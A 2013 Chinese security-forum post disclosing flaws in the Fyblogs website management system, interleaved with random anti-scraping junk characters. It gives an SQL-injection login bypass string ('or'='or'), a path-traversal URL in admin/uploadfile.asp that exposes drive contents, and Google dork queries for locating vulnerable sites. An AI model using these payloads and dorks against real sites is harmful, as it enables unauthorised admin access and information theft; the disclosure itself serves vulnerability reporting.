找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1840|回复: 0
打印 上一主题 下一主题

Fyblogs网站管理系统漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-7 13:07:46 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: 未授权访问/权限绕过
+ R0 W/ G/ L( C3 E. c! p# q# n  H* Z+ W0 G; y
简要描述:
$ K2 A- J) `  u8 G  C$ K* u) j$ n. V( \6 T; j! M
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
2 B1 {( X$ H3 @% K: s5 e( a
2 S! m; ]- W; u详细说明:2 m9 y7 j# x* b3 N% }0 b: m" v

  D+ G, i# v# |后台万能密码 'or'='or'
& C% o* x# J* |/ e6 U" ~4 P( s后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!: J0 Y) L- K: h- I6 a: B/ v. C& Q; p
admin/uploadfile.asp?currentFolder=/upfiles/../
1 O0 c$ o; Y# P+ D) S1 s# Z
- Q6 }. V  i8 z* B& }, Y漏洞证明:7 @; Y. y$ ~: ~! I7 l" [- B

5 W2 A/ N4 l0 G( o- v/ |谷歌:inurl:type.asp?id=1 新闻中心
; Q6 _/ N0 g' q& }或者 :inurl:download_ok.asp?
: R9 W' G& z6 J- A4 G5 }
  z5 d$ S, b0 s6 ~3 ]可以测试
: s; j, ^7 |- N8 F5 g2 z0 ^0 X2 b! {  I/ f
, p' U0 d* k. ]8 s1 D; N% K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表